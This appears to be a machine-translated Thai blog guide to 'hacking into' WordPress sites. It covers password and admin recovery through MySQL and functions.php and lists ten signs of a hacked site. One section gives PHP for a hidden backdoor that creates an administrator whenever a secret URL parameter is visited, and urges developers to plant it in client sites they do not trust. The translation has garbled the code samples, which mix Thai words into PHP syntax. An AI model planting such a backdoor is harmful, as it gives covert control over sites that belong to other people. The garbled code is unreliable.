วิธีแฮ็คเข้าไปในเว็บไซต์ WordPress, คู่มือฉบับสมบูรณ์

วิธีแฮ็คเข้าไปในเว็บไซต์ WordPress คู่มือฉบับสมบูรณ์


เราจะไม่ให้อภัยอนุมัติหรือส่งเสริมพฤติกรรมที่ผิดกฎหมายหรือเป็นอันตราย! จุดประสงค์ของบทความนี้คือเพื่ออธิบายวิธีแฮ็คหรือเข้าใช้งานเว็บไซต์ WordPress ที่เป็นของคุณหรือคุณมีสิทธิ์ในการแก้ไขดูแลระบบและเข้าถึง ไม่ว่าคุณจะทำอะไรคุณจะทำด้วยตัวเอง. เราจะไม่รับผิดชอบต่อการกระทำของคุณ คู่มือนี้ให้บริการเพื่อการศึกษาเท่านั้น.

วิธีที่อธิบายจะช่วยให้คุณสามารถเข้าถึงไซต์ได้อีกครั้งแม้ว่าคุณจะไม่มีบัญชีอีกต่อไป แต่จะต้องใช้ข้อมูลบางอย่างเกี่ยวกับเว็บไซต์และพวกเขาจะไม่ช่วยให้คุณแฮ็คในการติดตั้ง WordPress แบบสุ่ม.

ในคู่มือนี้เรากำลังจะแสดงให้คุณเห็น:

  • วิธีแฮ็คเข้าสู่เว็บไซต์ WordPress
  • วิธีการสร้างแบ็คดอร์ใน WordPress
  • วิธีสร้างบัญชีผู้ใช้ใหม่ผ่าน FTP
  • 10 ลงนามไซต์ WordPress ของคุณถูกแฮ็ค

Contents

วิธีแฮ็คเข้าไปในเว็บไซต์ WordPress คู่มือฉบับสมบูรณ์

สถานการณ์ที่คุณสามารถช่วยตัวเองได้

หากคุณอยู่ในสถานการณ์ใดสถานการณ์หนึ่งต่อไปนี้วิธีการของเราจะช่วยให้คุณเข้าถึงได้อีกครั้ง:

  • คุณลืมชื่อผู้ใช้หรือที่อยู่อีเมล
  • ตัวเลือกรีเซ็ตรหัสผ่านไม่ทำงานบนเซิร์ฟเวอร์การโฮสต์
  • รีเซ็ตรหัสผ่านอีเมลจะไม่ผ่าน
  • คุณไม่สามารถเข้าถึงที่อยู่อีเมลของบัญชีได้อีกต่อไป
  • คุณรู้ชื่อผู้ใช้และรหัสผ่าน แต่ชุดค่าผสมไม่ทำงาน

หากต้องการใช้วิธีที่อธิบายไว้ด้านล่างคุณจะต้อง หนึ่งต่อไปนี้เท่านั้น:

  • การเข้าถึง FTP ไปยังเซิร์ฟเวอร์หรือ
  • cPanel เข้าถึงเซิร์ฟเวอร์หรือ
  • เข้าถึงฐานข้อมูล MySQL และความสามารถในการเชื่อมต่อจากระยะไกล

วิธี # 1 – วิธี MySQL

ใช้วิธีนี้เพื่อเปลี่ยนรหัสผ่าน (หรือชื่อผู้ใช้หากจำเป็น) ของผู้ใช้ที่มีอยู่หรือเพื่อสร้างบัญชีใหม่ คุณจะต้องเข้าถึง cPanel หรือเข้าถึง MySQL โดยตรงไปยังฐานข้อมูลของเว็บไซต์. มาเริ่มกันเลยโดยเปลี่ยนรหัสผ่านของผู้ใช้ปัจจุบัน.

หากคุณใช้ cPanel การเข้าสู่ระบบ (cPanel สามารถเข้าถึงได้ผ่านทาง https://yoursite.com:2083 ลิงก์) ค้นหาและเปิด phpMyAdmin. รายการฐานข้อมูลและตารางอยู่ทางด้านซ้าย. คุณกำลังมองหาตารางที่ลงท้ายด้วย _users. มันอาจจะเป็น wp_users, แต่ถ้าคุณมีมากกว่าหนึ่งเว็บไซต์ WordPress ติดตั้งบนเซิร์ฟเวอร์คุณจะต้องค้นหาเว็บไซต์ที่เหมาะสม.

ตารางด้านขวาจะมีผู้ใช้ที่คุณต้องการแก้ไข ทำตามขั้นตอนเดียวกันหากคุณกำลังเชื่อมต่อกับ MySQL ผ่านไคลเอนต์ภายนอกบางอย่างเช่น SQLyog. เมื่อคุณค้นหาตารางและบันทึกผู้ใช้จริงแล้วก็ถึงเวลาเปลี่ยนรหัสผ่าน.

ตามที่คุณอาจทราบแล้วในตอนนี้รหัสผ่านจะถูกบันทึกไว้ใน user_pass ถูกแฮชโดยใช้อัลกอริทึม MD5 เปิด เครื่องกำเนิด MD5 ออนไลน์ ป้อนรหัสผ่านที่คุณต้องการใช้และคลิก“ แฮช”. คัดลอกสตริงที่สร้างและแทนที่รหัสผ่านเดิม กับมัน ใน phpMyAdmin คุณสามารถแก้ไขฟิลด์ได้โดยดับเบิลคลิกที่มัน กระบวนการนี้คล้ายกับไคลเอนต์ MySQL อื่น ๆ บันทึกการเปลี่ยนแปลงและเข้าสู่ระบบ WordPress ด้วยรหัสผ่านใหม่ของคุณ.

ตารางผู้ใช้ WP

ชื่อผู้ใช้รหัสผ่านที่ถูกแฮชและอีเมลจะถูกเก็บไว้ใน wp_users ตารางฐานข้อมูล

ยังอยู่ในวิธีที่ # 1 – การสร้างผู้ใช้ใหม่

การสร้างผู้ใช้ใหม่นั้นซับซ้อนกว่าเล็กน้อย แต่ก็สามารถจัดการได้ภายในเวลาไม่ถึงนาที. สร้างบันทึกใหม่ ในตารางผู้ใช้และเติม: user_login, user_pass (แฮชโดยใช้ฟังก์ชัน MD5 ที่อธิบายไว้ด้านบน) และ user_email ฟิลด์อื่นทั้งหมดสามารถคงว่างเปล่าได้ พวกเขาไม่สำคัญ บันทึกบันทึกใหม่ เมื่อบันทึกแล้ว MySQL จะให้รหัสเฉพาะ เป็นหมายเลขในฟิลด์ ID จำได้.

ตอนนี้ไปที่ _usermeta โต๊ะ. จำ, คำนำหน้าของตารางจะต้องเหมือนกับของผู้ใช้. ตัวอย่างเช่น wp_users และ wp_usersmeta. หากคำนำหน้าไม่เหมือนกันคุณกำลังแก้ไขตารางผิดพลาด (จากการติดตั้ง WP อื่น ๆ ) และบัญชีใหม่จะไม่ทำงาน เราจะสร้างระเบียนใหม่สองรายการ ไม่ต้องสนใจ umeta_id ฟิลด์สำหรับทั้งคู่ ชุด user_id ให้เป็นค่าที่คุณเพิ่งจดจำ (ค่า ID ใหม่ในตารางผู้ใช้) สำหรับชุดระเบียนแรก meta_key ถึง wpct_user_level และ meta_value ถึง 10. สำหรับคนที่สอง meta_key ถึง wpct_capabilities และ meta_value ถึง A: 1: {s: 13: "ผู้ดูแลระบบ"; b: 1;}. บันทึกทั้งสอง คุณทำเสร็จแล้ว – เข้าสู่ระบบ!

วิธี # 2 – วิธี functions.php

วิธีการนี้สามารถใช้ประโยชน์ได้โดยการแก้ไข functions.php ผ่าน cPanel หรือโดยใช้ไคลเอนต์ FTP เพื่อทำเช่นนั้น หากใช้ cPanel ค้นหาตัวจัดการไฟล์และเปิด. ก่อนอื่นเราต้องค้นหาโฟลเดอร์ของธีมที่ใช้งานอยู่.

ไปที่ public_html / wp_content / รูปแบบ โฟลเดอร์ หากคุณเห็นธีมของคุณทันทีและรู้ว่าเป็นรูปใด – ยอดเยี่ยม เปิดโฟลเดอร์และเริ่มแก้ไข functions.php. ถ้าไม่เปิดเว็บไซต์คลิกขวาที่ใดก็ได้เลือก “ดูแหล่งที่มา” จากนั้นกด Ctrl + F และเริ่มพิมพ์ ธีม / / ในไม่ช้าคุณจะมี URL จำนวนมากถูกเน้นและคุณจะจำชื่อโฟลเดอร์ของชุดรูปแบบที่ใช้งานอยู่.

ค้นหาในโครงสร้างไฟล์เปิดและเริ่มแก้ไข functions.php. คัดลอก / วางรหัสต่อไปนี้ในตอนท้ายของไฟล์. ปิดใจ ?> แท็ก PHP ถ้าคุณมี. พวกเขาจะต้องอยู่ในบรรทัดสุดท้าย ดังนั้นใส่รหัสไว้ข้างหน้าพวกเขา.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (อาร์เรย์ ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = ใหม่ WP_User ($ user_id);
$ ที่ผู้ใช้> set_role ( 'ผู้ดูแล');
}

แก้ไขเพียงสองบรรทัดแรกของรหัสเพื่อแสดงบัญชีใหม่ของคุณ. หากมีผู้ใช้ใน WP ที่ใช้อีเมลนั้นบัญชีใหม่จะไม่ถูกสร้างขึ้นดังนั้นให้แน่ใจว่าเป็นบัญชีใหม่. เปลี่ยนรหัสผ่านเช่นกัน – อย่าโดนแฮ็คโดยสคริปต์เด็ก หลังจากบันทึกไฟล์เพียงเปิดเว็บไซต์ของคุณรหัสจะถูกเรียกใช้บัญชีใหม่ที่สร้างสิทธิ์ผู้ดูแลระบบและคุณจะสามารถลงชื่อเข้าใช้ด้วย.

หลังจากที่คุณทำเช่นนั้นอย่าลืมลบรหัสจาก functions.php.

วิธีการแฮ็กอื่น ๆ

ด้วยการรู้ FTP, cPanel หรือรหัสผ่าน MySQL คุณจะพิสูจน์ว่าคุณมีสิทธิ์เข้าถึงเซิร์ฟเวอร์ที่ถูกต้องตามกฎหมายและดังนั้นจึงควรมีการเข้าถึงการติดตั้ง WordPress เช่นกัน หากคุณไม่มีบัญชีใด ๆ เหล่านั้นแสดงว่าคุณไม่ดี (แฮ็คเข้าสู่ไซต์ของผู้อื่น) และนั่นก็ไม่ดี!

โปรดจำไว้ว่าการเข้าใช้คอมพิวเตอร์ไซต์หรือเซิร์ฟเวอร์ใด ๆ โดยไม่ได้รับอนุญาตถือเป็นอาชญากรรมร้ายแรงและได้รับการจัดการโดยทันทีในประเทศส่วนใหญ่.

หากคุณกลัวว่าไซต์ WordPress ของคุณจะถูกแฮกโปรดตรวจสอบหน้านี้ด้วยเครื่องสแกนความปลอดภัย WordPress ฟรี หากคุณไม่มีเวลาในการตั้งค่าบล็อกให้เราทำเพื่อคุณ.

วิธีการสร้างแบ็คดอร์ใน WordPress

เมื่อปิดประตูหน้าคุณอาจลองประตูหลัง อาจเป็นวิธีที่เป็นอันตรายในการใช้รหัสเพื่อเข้าเว็บไซต์โดยไม่ต้องมีการเข้าถึง แต่มีบางครั้งที่คุณจำเป็นต้องควบคุมไซต์ของคุณเองหากมีคนขโมยมัน.

หากเป็นการสร้างเว็บไซต์สำหรับคนอื่น ๆ ที่คุณทำไม่ช้าก็เร็วจะมีลูกค้าที่ปฏิเสธที่จะจ่ายเงินให้กับงานของคุณ ลูกค้าที่จะลบข้อมูลการเข้าสู่ระบบของคุณและควบคุมทุกสิ่งที่คุณทำ บางครั้งมันจะเพียงพอที่จะสร้างผู้ใช้ใหม่ผ่านทาง FTP หรือเพื่อรีเซ็ตรหัสผ่าน เมื่อนั้นยังไม่เพียงพอ, คุณอาจต้องการแฮ็กทางกลับหรือสร้างการเข้าถึงลับๆบนหน้าผู้ดูแลระบบของคุณ.

แต่ถ้าคุณตัดสินใจที่จะซ่อนโค้ดชิ้นเล็ก ๆ ในสภาพแวดล้อม WordPress ของคุณคุณอาจช่วยชีวิตคุณให้ศักดิ์ศรี เข้าถึงเว็บไซต์ WordPress ด้วยสิทธิ์ผู้ดูแลระบบ. และนั่นคือจุดเริ่มต้นของเกม.

ไม่ว่าขโมยนี้จะลบข้อมูลของคุณกี่ครั้งหรือเรียกคืนการสำรองข้อมูลบนเซิร์ฟเวอร์ที่เขาอาจเป็นเจ้าของมีโอกาสที่เขาจะไม่รู้อะไรเกี่ยวกับทางเข้าลับๆ ถ้าเขาทำเขาอาจจะไม่ต้องการความช่วยเหลือจากคุณในการตั้งค่า WordPress ใช่ไหม?

สร้างแบ็คดอร์:

ตกลงพอกับการพูดคุย; นี่คือโค้ดบางส่วนที่คุณจะต้องทำให้งานสำเร็จ:

  1. เปิดไฟล์ functions.php
  2. คัดลอก / วางรหัสต่อไปนี้:
  3. add_action ('wp_head', 'wploop_backdoor');
    ฟังก์ชั่น wploop_backdoor () {
    ถ้า ($ _GET ['backdoor'] == 'knockknock') {
    ต้อง (WP-includes / registration.php ');
    หาก (! username_exists ('ชื่อผู้ใช้')) {
    $ user_id = wp_create_user ('ชื่อ', 'ผ่าน');
    $ user = ใหม่ WP_User ($ user_id);
    $ ที่ผู้ใช้> set_role ( 'ผู้ดูแล');
    }
    }
    }
    ?>
  4. บันทึกการเปลี่ยนแปลง

หากคุณปล่อยให้รหัสเหมือนเดิมสิ่งที่คุณต้องทำเพื่อสร้างผู้ดูแลระบบใหม่ในเว็บไซต์คือการเข้าชม http://www.yourdomain.com/?backdoor=knockknock

หลังจากโหลดหน้านี้แล้วชื่อผู้ใช้ใหม่ของคุณคือ “ชื่อ” และรหัสผ่าน “ผ่าน”.

แน่นอน, คุณสามารถเปลี่ยนได้ในรหัส ด้านบนโดยการเปลี่ยน “ชื่อ” และ “ผ่าน” เพื่อสิ่งที่คุณต้องการ นอกจากนี้คุณยังสามารถเปลี่ยนลิงก์ไปที่ประตูหลังของคุณได้โดยเปลี่ยน ‘backdoor’ และ / หรือ ‘knockknock’ เป็นอะไรก็ได้.

ลองใช้ฟังก์ชั่น – ไม่เพียงแค่สนุก แต่มันสามารถช่วยคุณได้ในอนาคตเมื่อคุณกำลังจะสร้างเว็บไซต์ให้กับคนที่คุณไม่สามารถไว้วางใจได้อย่างสมบูรณ์ คุณควรเพิ่มระดับทักษะ WordPress และบล็อกของคุณ.

วิธีสร้างบัญชีผู้ใช้ใหม่ผ่าน FTP

การสร้างบัญชีผู้ใช้ใหม่บน WordPress นั้นง่ายมาก ในฐานะผู้ดูแลคุณจะต้อง นำทางไปยังหน้าผู้ดูแลระบบผู้ใช้ ที่ซึ่งคุณสามารถสร้างบัญชีใหม่สำหรับบทบาทผู้ใช้ใด ๆ สามารถทำได้ภายในไม่กี่วินาทีและผู้ใช้ที่เพิ่งสร้างใหม่สามารถเข้าสู่ระบบได้ทันทีด้วยชื่อผู้ใช้และรหัสผ่านที่กำหนด.

แต่จะเกิดอะไรขึ้นถ้าคุณไม่สามารถเข้าถึงผู้ดูแลระบบ WordPress ของคุณ? สิ่งต่าง ๆ อาจมีความซับซ้อนเพิ่มขึ้นเล็กน้อย แต่ไม่ต้องกังวลเรามีฟังก์ชั่นสำหรับคุณที่จะช่วยชีวิตผู้ดูแลระบบของคุณ.

ไม่ว่าผู้ดูแลระบบคนอื่นจะลบบัญชีของคุณไม่ว่าคุณจะลบผู้ใช้ทั้งหมดออกจากฐานข้อมูลโดยไม่ได้ตั้งใจใช้ปลั๊กอินที่ทำงานผิดพลาดหรือถูกแฮ็กคุณก็ยังสามารถควบคุมได้ บางครั้งคุณอาจเข้าถึงเฉพาะเซิร์ฟเวอร์ FTP ของคุณในขณะที่ HTTP นั้นไม่สามารถเข้าถึงได้และคุณจะต้องสร้างผู้ดูแลระบบใหม่ ในขณะที่อาจเป็นกรณีที่หายากฟังก์ชั่นต่อไปนี้จะช่วยให้คุณประหยัด.

เพื่อสร้างบัญชีใหม่นอกสภาพแวดล้อมของผู้ดูแลระบบ WordPress, สิ่งที่คุณต้องมีก็คือการเข้าถึง FTP ไปยังเว็บไซต์ของคุณ ในฐานะผู้ดูแลระบบคุณควรมีข้อมูลที่จำเป็นทั้งหมดในการเข้าสู่เซิร์ฟเวอร์ของคุณและคุณสามารถสร้างบัญชีใหม่ได้อย่างรวดเร็วโดยการสร้างฟังก์ชั่นใหม่ในธีมของคุณ.

สร้างบัญชีผู้ใช้ใหม่ผ่าน FTP:

  1. เปิดไคลเอนต์ FTP และเชื่อมต่อกับบัญชีของคุณ
  2. นำทางไปยัง wp-content / themes
  3. เปิดโฟลเดอร์ของชุดรูปแบบที่คุณใช้
  4. ค้นหาไฟล์ functions.php และแก้ไข
  5. คัดลอกและวางฟังก์ชันต่อไปนี้:
  6. ฟังก์ชั่น admin_account () {
    $ user = 'ชื่อผู้ใช้';
    $ pass = 'รหัสผ่าน';
    $ email = '[email protected]';
    if (! username_exists (ผู้ใช้ $) &&! email_exists ($ email)) {
    $ user_id = wp_create_user (ผู้ใช้ $, $ ผ่าน, $ อีเมล);
    $ user = ใหม่ WP_User ($ user_id);
    $ user-> set_role ('ผู้ดูแลระบบ');
    }}
    add_action ( 'init', 'admin_account');
    
  7. เปลี่ยนชื่อผู้ใช้รหัสผ่านและอีเมลเป็นสิ่งที่ไม่ซ้ำใคร
  8. บันทึกการเปลี่ยนแปลง

ตรวจสอบให้แน่ใจว่าชื่อผู้ใช้รหัสผ่านและที่อยู่อีเมลที่คุณตั้งไว้ในฟังก์ชั่นนั้นไม่ซ้ำกัน มิฉะนั้นฟังก์ชั่นจะไม่ทำงานอย่างถูกต้อง เมื่อคุณบันทึกการเปลี่ยนแปลงแล้วคุณก็ทำเสร็จแล้วและคุณสามารถนำทางไปยังแผงเข้าสู่ระบบ WP ของคุณ ใช้ข้อมูลใหม่เพื่อเข้าสู่ระบบอีกครั้งและเมื่อคุณได้ตรวจสอบบัญชีคุณสามารถลบฟังก์ชั่นจากไฟล์ functions.php.

ฟังก์ชั่นที่แสดงด้านบนสร้างบัญชีผู้ดูแลระบบ แต่คุณสามารถปรับเปลี่ยนได้อย่างง่ายดายเพื่อสร้างบัญชีด้วยบทบาทผู้ใช้อื่น ๆ ง่ายดาย เปลี่ยนบทบาทใน 8TH แถว ของรหัสถึงผู้แก้ไขผู้เขียนผู้สมัครสมาชิกหรือบทบาทผู้ใช้อื่น ๆ ที่คุณสร้างขึ้น.

น่าเสียดายที่ถ้าคุณทำบัญชีผู้ดูแลระบบของคุณสูญหายคุณก็สูญเสียโพสต์ทั้งหมดที่เขียนภายใต้ชื่อผู้ใช้นั้น นั่นเป็นสาเหตุที่คุณควรสำรองข้อมูลซึ่งคุณสามารถเรียกคืนได้ง่าย หากคุณกำลังอ่านสิ่งนี้ในขณะที่มีบัญชีผู้ดูแลระบบของคุณ, ใช้สิ่งนี้เป็นเครื่องเตือนความจำเพื่อสร้างการสำรองข้อมูลทันที และคั่นหน้าบทความนี้ในกรณีที่คุณจำเป็นต้องสร้างบัญชีภายนอก WordPress ในอนาคต.

10 ลงนามไซต์ WordPress ของคุณถูกแฮ็ค

WordPress เป็นแพลตฟอร์มบล็อกขนาดใหญ่ มีผู้ใช้หลายล้านคนและดูเหมือนว่าจำนวนจะเพิ่มขึ้นอย่างรวดเร็วในแต่ละวัน ผู้คนมักจะถ่ายโอนเว็บไซต์ของพวกเขาที่สร้างขึ้นในระบบการจัดการเนื้อหาอื่น ๆ ไปยังระบบโอเพ่นซอร์สนี้บ่อยกว่าที่คุณคิด และในขณะนี้เป็นสิ่งที่ดีซึ่งหมายความว่า แฮกเกอร์จะวางเวิร์ดเพรสเป็นอันดับหนึ่งเมื่อพยายามบุกรุกเว็บไซต์สุ่ม.

โดยปกติถ้าคุณถูกแฮ็คคุณจะรู้ทันที เว็บไซต์ของคุณจะไม่สามารถเข้าถึงได้ คุณจะไม่สามารถเข้าสู่ระบบได้และบางครั้งแฮ็กเกอร์จะทิ้งข้อความไว้ที่หน้าแรก แต่บ่อยกว่าไม่, คุณอาจไม่สังเกตเห็นว่ามีบางอย่างเปลี่ยนไป. ในส่วนนี้ของบทความเราจะแสดงสัญญาณหลายอย่างที่อาจแสดงให้คุณเห็นว่าไซต์ WordPress ของคุณถูกแฮ็กและวิธีแก้ปัญหาเล็กน้อย.

1. เข้าสู่ระบบไม่สำเร็จ

สัญลักษณ์นี้เห็นได้ชัดมาก หากคุณใช้ชื่อผู้ใช้และรหัสผ่านรวมกันมาพักหนึ่งแล้วโดยไม่เกิดปัญหาใด ๆ คุณอาจสงสัยถ้า WordPress ไม่รู้จักบัญชีของคุณ. หากแฮกเกอร์ต้องเข้าสู่เว็บไซต์ของคุณโอกาสที่เขาจะเปลี่ยนสิทธิ์ผู้ดูแลระบบของคุณอย่างรวดเร็ว.

บางทีเขาอาจต้องเปลี่ยนรหัสผ่านหรือลบบัญชีของคุณโดยสมบูรณ์ ก่อนที่คุณจะเริ่มตื่นตระหนกหลังจากครั้งแรกที่ WordPress ส่งข้อความถึงคุณเกี่ยวกับชื่อผู้ใช้ / รหัสผ่านที่ไม่ถูกต้องโปรดพิจารณาข้อเท็จจริงที่ว่าคุณอาจใส่ชุดที่ไม่ถูกต้องหรือคุณอาจเปิดปุ่มตัวล็อค.

สารละลาย: ลองกู้คืนรหัสผ่านทางอีเมลหรือใช้บัญชีอื่นเพื่อเข้าสู่ระบบอีกครั้งเพื่อให้แน่ใจว่าคุณเข้าสู่ระบบอย่างปลอดภัยเราขอแนะนำให้ติดตั้ง เข้าสู่ระบบนินจา ปลั๊กอินสำหรับ WordPress.

2. เพิ่มเนื้อหาที่เป็นอันตรายลงในไซต์ของคุณ

ไซต์มีคำเตือนมัลแวร์

หากคุณเริ่มสังเกตเห็นเนื้อหาที่ไม่คุ้นเคยบนไซต์ของคุณคุณอาจเริ่มกังวล เมื่อพวกเขาได้รับโอกาสเข้าถึงพื้นที่ผู้ดูแลระบบของคุณ, แฮกเกอร์จะสามารถเปลี่ยนแกนและไฟล์ธีมและปลั๊กอินของคุณ. นั่นหมายความว่าพวกเขาจะเปลี่ยนแปลงสิ่งที่พวกเขาต้องการ.

ในขณะที่แฮ็กเกอร์บางคนจะปรับเปลี่ยนรูปลักษณ์ของไซต์ของคุณอย่างรุนแรงและอาจสะกดว่าคุณถูกแฮ็กคนอื่น ๆ จะมีความละเอียดอ่อนมากขึ้นเกี่ยวกับเรื่องนี้.

สารละลาย: ลองค้นหาเนื้อหาที่ซ่อนอยู่ในรหัสเว็บไซต์ อาจมีลิงก์ไปยังเว็บไซต์ที่เป็นอันตรายแฮ็กเกอร์ที่ปลูกไว้ในส่วนท้ายของเว็บไซต์ของคุณหรืออาจมีป๊อปอัปติดตั้งซึ่งจะเปิดเป็นประจำให้กับลูกค้าของคุณ ใช้ Security Ninja เพื่อสแกนเว็บไซต์ของคุณหรือตรวจสอบเว็บไซต์ของคุณอย่างต่อเนื่องสำหรับปัญหาดังกล่าว.

3. การเข้าชมที่น่าสงสัย

หากคุณไม่ได้ติดตามเว็บไซต์ของคุณคุณควรเริ่มทำทันที วิธีง่ายๆในการใช้ Google Analytics ซึ่งในบรรดาคุณสมบัติอื่น ๆ สามารถบอกคุณได้ว่าคุณได้รับการเข้าชมจำนวนเท่าใดและการเข้าชมเหล่านั้นมาจากที่ไหน หลังจากนั้นสักครู่คุณจะได้รู้จักเว็บไซต์ของคุณ ซึ่งหมายความว่าคุณจะรู้ว่าการเข้าชมมาจากที่ใดคุณจะรู้ว่าเมื่อคุณเปิดตัวแคมเปญใหม่และเมื่อมีลิงค์โปรโมชั่นใหม่เปิดตัว.

แต่ถ้าคุณสังเกตเห็นว่าเว็บไซต์ของคุณได้รับการเข้าชมใหม่จำนวนมากจากโดเมนที่น่าสงสัย, คุณจะต้องตรวจสอบเรื่องนี้ต่อไปเพราะเว็บไซต์ของคุณอาจถูกแฮ็ค โดยทั่วไปแล้วการเข้าชมประเภทนั้นจะส่งผลให้อัตราตีกลับ 100% ซึ่งหมายความว่ามีการเข้าถึงหน้าเว็บเพียงหน้าเดียว แฮกเกอร์มักจะใช้ระบบอัตโนมัติที่จะนำเว็บไซต์ที่ไม่ดีอื่น ๆ มาให้คุณ ไม่ว่าจะเป็นรหัสที่ไม่ดีที่ถูกเรียกใช้บนไซต์ของคุณหรือคุณเป็นส่วนหนึ่งของเครือข่ายสแปมสิ่งต่าง ๆ อาจร้ายแรงและคุณจะต้องตรวจสอบเว็บไซต์ของคุณเพื่อหารหัสอันตราย.

สารละลาย: ใช้ เครื่องมือเว็บมาสเตอร์ของ Google เพื่อค้นหาโดเมนที่น่าสงสัย

4. การจราจรลดลงอย่างฉับพลัน

เรียกดูสถานะไซต์อย่างปลอดภัย

ซึ่งแตกต่างจากสัญญาณที่กล่าวถึงครั้งสุดท้ายของการแฮ็กสัญญาณนี้อาจแจ้งเตือนคุณเนื่องจากมีจำนวนการเข้าชมลดลง แทนที่จะอ้างอิงการเข้าชมใหม่ให้กับคุณ, แฮกเกอร์อาจส่งการเข้าชมออกจากเว็บไซต์ของคุณ. สิ่งนี้อาจเกิดขึ้นเนื่องจากแฮกเกอร์เปลี่ยนเส้นทางเว็บไซต์ของคุณไปยังอีกไซต์หนึ่ง อีกเหตุผลที่ทำให้ผู้เยี่ยมชมน้อยลงนั่นคือ Google ขึ้นบัญชีดำในเว็บไซต์ของคุณ การดำเนินการนี้จะแสดงข้อความถึงผู้ใช้ทุกคนที่อาจเลือกที่จะไม่เปิดเว็บไซต์ของคุณเพราะติดไวรัส.

สารละลาย: ใช้ Google เรียกดูสถานะไซต์ที่ปลอดภัย เพื่อตรวจสอบว่าไซต์ของคุณถูกทำเครื่องหมายว่าไม่ปลอดภัยหรือไม่และอาจเป็นอันตรายต่อการเข้าชมในปัจจุบัน.

5. ผลลัพธ์ของเครื่องมือค้นหาแปลก

หากคุณไม่สังเกตเห็นการเปลี่ยนแปลงใด ๆ ในเว็บไซต์ของคุณ แต่คุณพบว่าผลการค้นหาใน Google และเครื่องมือค้นหาอื่น ๆ นั้นแปลก (แสดงชื่อเรื่องที่แตกต่างกันและข้อมูลเมตาอื่น ๆ ) นี่อาจเป็นสัญญาณที่ชัดเจนของไซต์ที่ถูกแฮ็ก แฮกเกอร์อาจเปลี่ยนเนื้อหาของคุณในแบบที่ผู้เชี่ยวชาญมองเห็นได้เท่านั้น อย่างไรก็ตามการเปลี่ยนแปลงจะปรากฏในผลลัพธ์ของเครื่องมือค้นหา.

สารละลาย: ตรวจสอบเว็บไซต์ของคุณด้วย เครื่องมือเว็บมาสเตอร์ของ Google, และตรวจสอบว่าไซต์ของคุณถูกแฮ็กหรือไม่ เครื่องมือออนไลน์ฟรี.

6. คุณไม่สามารถส่ง / รับอีเมล

เมื่อแฮกเกอร์เข้าถึงเว็บไซต์ของคุณเขาอาจจะต้องการ ใช้เซิร์ฟเวอร์ของคุณเพื่อส่งสแปมให้คนอื่น. เมื่อคุณพบว่าคุณไม่สามารถส่งหรือรับอีเมลใหม่จาก WordPress ของคุณนี่อาจเป็นสัญญาณที่ชัดเจนว่าคุณถูกแฮ็ก ตรวจสอบอีเมลของคุณอีกครั้งจากนั้นตรวจสอบกับผู้ให้บริการของคุณเพื่อให้แน่ใจว่าไม่มีข้อผิดพลาดเกิดขึ้น.

สารละลาย: ทดสอบ WordPress ของคุณ ฟังก์ชั่นจดหมาย ด้วยปลั๊กอินฟรีนี้.

7. เว็บไซต์ไม่มีอยู่จริง

ไม่พบเซิร์ฟเวอร์

มีบางครั้งที่แฮ็คเกอร์จะไม่สามารถเข้าถึงไซต์ของคุณเพื่อสร้างรหัสที่เป็นอันตรายเปลี่ยนเส้นทางผู้ใช้หรือใช้อีเมลเพื่อหาสแปม บางครั้ง, สิ่งที่พวกเขาต้องการจะทำคือการทำให้เว็บไซต์ของคุณพัง. ไม่นานนักแฮกเกอร์จะลบทุกอย่างออกจากเซิร์ฟเวอร์ทั้งหมด นั่นเป็นเหตุผลว่าทำไมจึงเป็นสิ่งสำคัญที่คุณต้องโฮสต์ไฟล์ของคุณกับ บริษัท โฮสติ้งที่มีชื่อเสียงซึ่งจะต้องมีความปลอดภัยและจะทำการสำรองข้อมูลรายวันหรืออย่างน้อยทุกสัปดาห์ของเว็บไซต์ เป็นแนวปฏิบัติที่ดีที่คุณต้องสำรองข้อมูลเป็นครั้งคราวเพื่อให้ไซต์สามารถกู้คืนได้อย่างรวดเร็ว.

สารละลาย: ติดตั้งหนึ่งในปลั๊กอินที่ดีที่สุดสำหรับการจัดการการสำรองข้อมูลใน WordPress.

8. ไฟล์ที่น่าสงสัย

คล้ายกับเนื้อหาที่เป็นอันตรายซึ่งอาจถูกเพิ่มลงในไฟล์ที่มีอยู่, แฮ็กเกอร์อาจวางไฟล์พิเศษไว้ที่ใดก็ได้ในโฟลเดอร์รูทของคุณ. มันเป็นเรื่องดีที่คุณจะรู้ทางของคุณเกี่ยวกับ WordPress แต่ถ้าคุณไม่เคยมีประสบการณ์มาก่อนคุณควรมีเครื่องมือรักษาความปลอดภัยในการกำจัดซึ่งสามารถตรวจสอบไฟล์และกิจกรรมทั้งหมดของคุณได้ เมื่อเร็ว ๆ นี้เราได้ตรวจสอบ Security Ninja ซึ่งเป็นเครื่องมือที่สมบูรณ์แบบสำหรับการตรวจสอบไฟล์ WordPress ทั้งหมดของคุณ.

สารละลาย: ลองค้นหาไฟล์ที่ไม่ได้อยู่ในการติดตั้ง WordPress ของคุณ ใช้ Security Ninja เพื่อสแกนเว็บไซต์ของคุณเป็นประจำและค้นหาไฟล์เหล่านั้นโดยอัตโนมัติ จากนั้นลบไฟล์หรือลบรหัสที่เป็นอันตรายออกจากไฟล์ที่ติดไวรัส อย่าลืมโปรแกรมเสริม Core Scanner สำหรับ Security Ninja.

9. สมาชิกใหม่

คุณอาจเป็นคนเดียวที่สามารถเพิ่มสมาชิกใหม่ได้ทั้งนี้ขึ้นอยู่กับไซต์ของคุณ ในกรณีนี้อีเมลที่บอกคุณเกี่ยวกับผู้ใช้ที่เพิ่งลงทะเบียนใหม่อาจทำให้เกิดการเตือนภัย หากมีผู้ดูแลระบบคนอื่น ๆ ที่มีความสามารถในการเพิ่มสมาชิกใหม่ให้ตรวจสอบกับพวกเขาเกี่ยวกับกิจกรรมที่น่าสงสัย.

สารละลาย: เปลี่ยน URL การเข้าสู่ระบบด้วยปลั๊กอินฟรี จำกัด การเข้าถึงหน้าเข้าสู่ระบบ WordPress ของคุณโดยใช้ไฟล์. htpasswd และใช้นินจาเข้าสู่ระบบเพื่อปกป้องแบบฟอร์มการเข้าสู่ระบบของคุณตลอดเวลา.

10. ตรวจสอบกิจกรรมที่กำหนดไว้ในเซิร์ฟเวอร์ของคุณ

